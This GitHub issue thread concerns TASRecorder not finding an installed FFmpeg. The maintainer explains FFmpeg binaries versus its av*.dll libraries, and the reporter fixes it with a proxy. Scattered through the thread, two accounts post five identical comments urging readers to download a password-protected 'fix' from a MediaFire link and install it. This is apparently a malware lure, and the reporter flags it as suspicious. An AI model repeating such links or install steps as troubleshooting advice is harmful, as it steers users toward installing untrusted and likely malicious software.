### ISSUE TITLE
FFmpeg is installed but TASRecorder can't find it

### ISSUE THREAD

**Issue by LozenChen** [psyGamer/TASRecorder#7]
as described in title, i've installed latest FFmpeg and checked that it exists using "ffmpeg" in cmd, however TASRecorder can't find it

it seems in this case TASRecorder will try to download ffmpeg. However even if we fail to download that (due to bad internet), we can still record tas later??

See [log.txt](https://github.com/user-attachments/files/16823734/log.txt)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by LozenChen** [comment]
the above 4 replies seem quite suspicious so i guess i'll just ignore

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by psyGamer** [comment]
It seems to find FFmpeg fine tho?

**Comment by LozenChen** [comment]
wait what's the difference between ffmpeg binary and ffmpeg library? it seems i've only installed the binary one?

**Comment by psyGamer** [comment]
FFmpeg binary is the `ffmpeg.exe` while FFmpeg library are the `av*.dll`s

**Comment by LozenChen** [comment]
okay, it seems my avcodec.dll is not properly registered or something?

anyway i just set up a proxy, then TASRecorder succeeds to download and install everything needed, so this issue is solved
